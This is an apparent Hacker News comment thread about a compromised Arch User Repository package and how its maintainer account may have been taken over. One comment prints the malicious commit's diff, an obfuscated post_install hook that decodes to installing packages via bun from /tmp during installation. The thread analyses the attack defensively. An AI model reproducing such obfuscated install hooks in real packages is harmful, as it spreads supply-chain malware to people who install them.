Is there any information on if this is the same attack vector (orphaned packages that were adopted)? I believe they already locked down adoption, but maybe also a combination of existing maintainers being taken over?

▲ cge 9 hours ago | parent [-]

The reported commit [1] suggests to me that it was an account compromise of some sort, not orphan+adopt: the committer is the same in git, but the contact email changes in the PKGBUILD.

This doesn't necessarily seem 'more elaborate': it is attempting to be better obfuscated against automated checks at the cost of being very obvious to anyone doing even a cursory review of the install scripts. It's also likely something that would be caught instantly by even an extremely naive LLM, as seems to have been the case here. There's simply no legitimate reason why an install script would ever do something like this:

  diff --git a/htbrowser-bin-deps.install b/htbrowser-bin-deps.install
  new file mode 100644
  index 000000000000..9806501accad
  --- /dev/null
  +++ b/htbrowser-bin-deps.install
  @@ -0,0 +1,3 @@
  +post_install() {
  +  $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'
  +}

[1]: https://aur.archlinux.org/cgit/aur.git/commit/?h=htbrowser-b...

	▲	zootboy 8 hours ago \| parent [-]
		I'm not certain that the git committer tells you the full story. I don't believe the AUR enforces that the git commit email is the same as the current maintainer email. So this could have been an orphan package, adopted by a malicious user, generated a malicious commit with the previous maintainer's git info. Unfortunately, I don't see a way of viewing the ownership history of a package in the AUR. I know you get emails with ownership changes if you're subscribed to a package, but I don't see this info in the web interface anywhere.